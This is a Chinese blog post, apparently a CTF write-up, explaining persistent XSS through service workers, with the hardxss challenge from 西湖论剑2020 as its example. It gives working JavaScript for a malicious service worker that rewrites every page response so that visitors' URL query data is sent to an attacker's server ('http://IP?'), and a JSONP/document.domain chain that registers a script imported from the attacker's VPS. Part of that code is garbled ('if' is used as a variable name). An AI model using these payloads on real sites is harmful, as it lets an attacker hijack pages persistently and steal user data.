<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="青山">



    <meta name="description" content="我见青山多妩媚，料青山见我应如是。">



<title>持久化xss基础——xss with service worker | 青山</title>



    <link rel="icon" href="/image/1.jpg">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="青山" type="application/atom+xml">
</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">青山</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">青山</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">持久化xss基础——xss with service worker</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">青山</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">November 2, 2020&nbsp;&nbsp;12:15:59</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/xss-with-service-worker/">xss with service worker</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="持久化XSS基础-——-xss-with-service-worker"><a href="#持久化XSS基础-——-xss-with-service-worker" class="headerlink" title="持久化XSS基础 —— xss with service worker"></a>持久化XSS基础 —— xss with service worker</h1><h2 id="service-worker-的简介"><a href="#service-worker-的简介" class="headerlink" title="service worker 的简介"></a>service worker 的简介</h2><h3 id="service-worker的概念"><a href="#service-worker的概念" class="headerlink" title="service worker的概念"></a>service worker的概念</h3><blockquote>
<p>Service worker是一个注册在指定源和路径下的事件驱动<a href="https://developer.mozilla.org/zh-CN/docs/Web/API/Worker" target="_blank" rel="noopener">worker</a>。它采用JavaScript控制关联的页面或者网站，拦截并修改访问和资源请求，细粒度地缓存资源。你可以完全控制应用在特定情形（最常见的情形是网络不可用）下的表现。</p>
<p>Service worker运行在worker上下文，因此它不能访问DOM。相对于驱动应用的主JavaScript线程，它运行在其他线程中，所以不会造成阻塞。它设计为完全异步，同步API（如<a href="https://developer.mozilla.org/zh-CN/docs/Web/API/XMLHttpRequest" target="_blank" rel="noopener">XHR</a>和<a href="https://developer.mozilla.org/zh-CN/docs/Web/Guide/API/DOM/Storage" target="_blank" rel="noopener">localStorage</a>）不能在service worker中使用。</p>
<p>出于安全考量，Service workers只能由HTTPS（出于调试方便，还支持在localhost使用），毕竟修改网络请求的能力暴露给中间人攻击会非常危险。在Firefox浏览器的<a href="https://support.mozilla.org/zh-CN/kb/隐私浏览" target="_blank" rel="noopener">用户隐私模式</a>，Service Worker不可用。</p>
<p><a href="https://developer.mozilla.org/zh-CN/docs/Web/API/Service_Worker_API" target="_blank" rel="noopener">官方文档</a></p>
</blockquote>
<p>1、只能注册同源下的js</p>
<p>2、站内必须支持Secure Context，也就是站内必须是<code>https://</code>或者<code>http://localhost/</code></p>
<p>3、Content-Type必须是js</p>
<ul>
<li>text/javascript</li>
<li>application/x-javascript</li>
<li>application/javascript</li>
</ul>
<p>总之service worker就是一个介于服务端和客户端的一个 代理服务器。</p>
<h3 id="service-worker的基本架构"><a href="#service-worker的基本架构" class="headerlink" title="service worker的基本架构"></a>service worker的基本架构</h3><h4 id="生命周期"><a href="#生命周期" class="headerlink" title="生命周期"></a>生命周期</h4><p>service worker是通过serviceWorkerContainer.register() 来获取和注册的</p>
<p><img src="https://my-blog-rookie.oss-cn-beijing.aliyuncs.com/img/image-20201031134706014.png" alt="image-20201031134706014"></p>
<blockquote>
<p>关于Promise</p>
<p><strong>Promise</strong> 对象用于表示一个异步操作的最终完成 (或失败)及其结果值。其精髓是支持链式调用。</p>
<p>必然是以下三种状态之一</p>
<ul>
<li><em>待定（pending）</em>: 初始状态，既没有被兑现，也没有被拒绝。</li>
<li><em>已兑现（fulfilled）</em>: 意味着操作成功完成。</li>
<li><em>已拒绝（rejected）</em>: 意味着操作失败。</li>
</ul>
</blockquote>
<p>整个生命流程大致为下面的的几个步骤：</p>
<p><img src="https://my-blog-rookie.oss-cn-beijing.aliyuncs.com/img/image-20201031131851448.png" alt="image-20201031131851448"></p>
<h4 id="支持的事件"><a href="#支持的事件" class="headerlink" title="支持的事件"></a>支持的事件</h4><p><img src="https://my-blog-rookie.oss-cn-beijing.aliyuncs.com/img/image-20201031132732725.png" alt="image-20201031132732725"></p>
<h4 id="service-worker的作用域"><a href="#service-worker的作用域" class="headerlink" title="service worker的作用域"></a>service worker的作用域</h4><ul>
<li>service worker 只能抓取在 service worker scope 里从客户端发出的请求。</li>
<li>最大的 scope 是 service worker 所在的地址</li>
<li>如果你的 service worker 被激活在一个有 <code>Service-Worker-Allowed</code> header 的客户端，你可以为service worker 指定一个最大的 scope 的列表。</li>
<li>在 Firefox, Service Worker APIs 在用户在 用户隐私模式 下会被隐藏而且无法使用。</li>
</ul>
<p>整个service worker的作用域默认是service  woker 注册的脚本的路径。这个作用也可以使用跨域的方法扩展。</p>
<h3 id="service-worker控制页面返回响应"><a href="#service-worker控制页面返回响应" class="headerlink" title="service worker控制页面返回响应"></a>service worker控制页面返回响应</h3><h5 id="fetch事件"><a href="#fetch事件" class="headerlink" title="fetch事件"></a>fetch事件</h5><blockquote>
<p>使用<code>ServiceWorker</code>技术时,页面的提取动作会在ServiceWorker作用域(<code>ServiceWorkerGlobalScope</code>)中触发fetch事件.</p>
</blockquote>
<p>service worker可以监听fetch事件来达到篡改返回，对页面嵌入恶意的srcipt脚本。</p>
<h5 id="几个函数"><a href="#几个函数" class="headerlink" title="几个函数"></a>几个函数</h5><ul>
<li><p><code>WorkerGlobalScope.addEventListener(type,listener,option)</code></p>
<p><img src="https://my-blog-rookie.oss-cn-beijing.aliyuncs.com/img/image-20201101192113623.png" alt="image-20201101192113623"></p>
</li>
<li><p><code>event.respondwith(任何自定义的响应生成代码)</code></p>
<p>这个方法的目的是包裹段可以生成、返回response对象的代码，来控制响应。</p>
</li>
<li><p><code>Response(body,init)</code></p>
<p><img src="C:%5CUsers%5C3000%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201101193028796.png" alt="image-20201101193028796"></p>
</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//这个脚本可以将service worker作用域下的所有请求的url参数打到我的vps上。</span></span><br><span class="line"><span class="comment">//当然你也可以通过返回其他的东西来达到其他的目的。</span></span><br><span class="line"></span><br><span class="line">self.addEventListener(<span class="string">'install'</span>,<span class="function"><span class="keyword">function</span>(<span class="params">event</span>)</span>&#123;</span><br><span class="line">	<span class="built_in">console</span>.log(<span class="string">'install ok!'</span>);</span><br><span class="line">&#125;)</span><br><span class="line">self.addEventListener(<span class="string">'fetch'</span>,<span class="function"><span class="keyword">function</span>(<span class="params">event</span>)</span>&#123;</span><br><span class="line">	<span class="built_in">console</span>.log(event.request);</span><br><span class="line">	event.respondWith(</span><br><span class="line">	caches.match(event.request).then(<span class="function"><span class="keyword">function</span>(<span class="params">res</span>)</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">new</span> Response(<span class="string">'&lt;script&gt;location="http://IP?"+btoa(location.search)&lt;/script&gt;'</span>, &#123;<span class="attr">headers</span>: &#123; <span class="string">'Content-Type'</span>: <span class="string">'text/html'</span> &#125;&#125;)</span><br><span class="line">	&#125;)</span><br><span class="line">	)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<h2 id="service-worker的简单利用"><a href="#service-worker的简单利用" class="headerlink" title="service worker的简单利用"></a>service worker的简单利用</h2><h3 id="JSONP-service-worker"><a href="#JSONP-service-worker" class="headerlink" title="JSONP+service worker"></a>JSONP+service worker</h3><p>经过的介绍，知道了service worker只能使用同源的脚本注册，那么熟悉xss的师傅就很容易想到通过跨域来实现注册恶意脚本，那么JSONP就是一个好的搭配，因为jsonp的返回值都是js格式的，十分符合service worker的要求。</p>
<p><strong><em>西湖论剑2020的 jsonp</em></strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//这段代码最终的效果就是在页面上生成一个</span></span><br><span class="line"><span class="comment">// &lt;script src="https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback=输入的参数"&gt;&lt;/script&gt;</span></span><br><span class="line"><span class="comment">//标签</span></span><br><span class="line"></span><br><span class="line">callback = <span class="string">"get_user_login_status"</span>;</span><br><span class="line">auto_reg_var();<span class="comment">//获取url参数</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">typeof</span>(jump_url) == <span class="string">"undefined"</span> || <span class="regexp">/^\//</span>.test(jump_url))&#123;</span><br><span class="line">    jump_url = <span class="string">"/"</span>;</span><br><span class="line">&#125;</span><br><span class="line">jsonp(<span class="string">"https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback="</span> + callback,<span class="function"><span class="keyword">function</span>(<span class="params">result</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(result[<span class="string">'status'</span>])&#123;</span><br><span class="line">        location.href = jump_url;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">jsonp</span>(<span class="params">url, success</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> script = <span class="built_in">document</span>.createElement(<span class="string">"script"</span>);</span><br><span class="line">    <span class="keyword">if</span>(url.indexOf(<span class="string">"callback"</span>) &lt; <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="keyword">var</span> funName = <span class="string">'callback_'</span> + <span class="built_in">Date</span>.now() + <span class="built_in">Math</span>.random().toString().substr(<span class="number">2</span>, <span class="number">5</span>);</span><br><span class="line">        url = url + <span class="string">"?"</span> + <span class="string">"callback="</span> + funName;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">var</span> funName = callback;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">window</span>[funName] = <span class="function"><span class="keyword">function</span>(<span class="params">data</span>) </span>&#123;</span><br><span class="line">        success(data);</span><br><span class="line">        <span class="keyword">delete</span> <span class="built_in">window</span>[funName];</span><br><span class="line">        <span class="built_in">document</span>.body.removeChild(script);</span><br><span class="line">    &#125;</span><br><span class="line">    script.src = url;</span><br><span class="line">    <span class="built_in">document</span>.body.appendChild(script);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">auto_reg_var</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">var</span> search = location.search.slice(<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">var</span> search_arr = search.split(<span class="string">'&amp;'</span>);</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">var</span> i = <span class="number">0</span>;i &lt; search_arr.length; i++)&#123;</span><br><span class="line">        [key,value] = search_arr[i].split(<span class="string">"="</span>);</span><br><span class="line">        <span class="built_in">window</span>[key] = value;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="文件上传-service-worker"><a href="#文件上传-service-worker" class="headerlink" title="文件上传+service worker"></a>文件上传+service worker</h3><p>如果有文件上传的点，可以尝试上传恶意js脚本，一般来说上传的js代码也是js格式的。</p>
<h2 id="service-worker综合跨域扩展攻击"><a href="#service-worker综合跨域扩展攻击" class="headerlink" title="service worker综合跨域扩展攻击"></a>service worker综合跨域扩展攻击</h2><p><strong><em>西湖论剑2020xss</em></strong></p>
<p>在这个环境里面，有两个域名<code>auth.hardxss.xhlj.wetolink.com</code>和<code>xss.hardxss.xhlj.wetolink.com</code></p>
<p>jsop的点在 auth 子域名里面，xss的点在 xss 子域名里面，并且在xss页面有一个设置<code>document.domian=hardxss.xhlj.wetolink.com</code></p>
<p>的内容。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>&gt;</span></span><br><span class="line"><span class="javascript">	<span class="built_in">document</span>.domain = <span class="string">"hardxss.xhlj.wetolink.com"</span>;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>我们就可以尝试使用设置doucment.domain的方法来实行</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">document</span>.domain = <span class="string">"hardxss.xhlj.wetolink.com"</span>;</span><br><span class="line"><span class="keyword">var</span> <span class="keyword">if</span> = <span class="built_in">document</span>.createElement(<span class="string">'iframe'</span>);</span><br><span class="line"><span class="keyword">if</span>.src = <span class="string">'https://auth.hardxss.xhlj.wetolink.com/'</span>;</span><br><span class="line"><span class="keyword">if</span>.addEventListener(<span class="string">"load"</span>, <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123; iffLoadover(); &#125;);</span><br><span class="line"><span class="built_in">document</span>.body.appendChild(<span class="keyword">if</span>);</span><br><span class="line">exp = <span class="string">`navigator.serviceWorker.register("/api/loginStatus?callback=self.importScripts('vps/test.js')")`</span>;<span class="comment">//获取代码，要求https</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">iffLoadover</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    iff.contentWindow.eval(exp);<span class="comment">//注册代码</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong><em>test.js</em></strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">self.addEventListener(<span class="string">'install'</span>,<span class="function"><span class="keyword">function</span>(<span class="params">event</span>)</span>&#123;</span><br><span class="line">	<span class="built_in">console</span>.log(<span class="string">'install ok!'</span>);</span><br><span class="line">&#125;)</span><br><span class="line">self.addEventListener(<span class="string">'fetch'</span>,<span class="function"><span class="keyword">function</span>(<span class="params">event</span>)</span>&#123;</span><br><span class="line">	<span class="built_in">console</span>.log(event.request);</span><br><span class="line">	event.respondWith(</span><br><span class="line">	caches.match(event.request).then(<span class="function"><span class="keyword">function</span>(<span class="params">res</span>)</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">new</span> Response(<span class="string">'&lt;script&gt;location="http://IP?"+btoa(location.search)&lt;/script&gt;'</span>, &#123;<span class="attr">headers</span>: &#123; <span class="string">'Content-Type'</span>: <span class="string">'text/html'</span> &#125;&#125;)</span><br><span class="line">	&#125;)</span><br><span class="line">	)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>




























        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>青山</span>
                    </p>
                
                
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/xss/"># xss</a>
                    
                        <a href="/tags/web-worker/"># web worker</a>
                    
                        <a href="/tags/%E6%8C%81%E4%B9%85%E5%8C%96xss/"># 持久化xss</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/11/12/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E2%80%94kerberos%E5%8D%8F%E8%AE%AE/">内网渗透学习—kerberos协议</a>
            
            
            <a class="next" rel="next" href="/2020/10/27/%E6%B5%8F%E8%A7%88%E5%99%A8%E6%A8%A1%E5%9E%8B%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86/">浏览器模型基础</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© 青山 | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
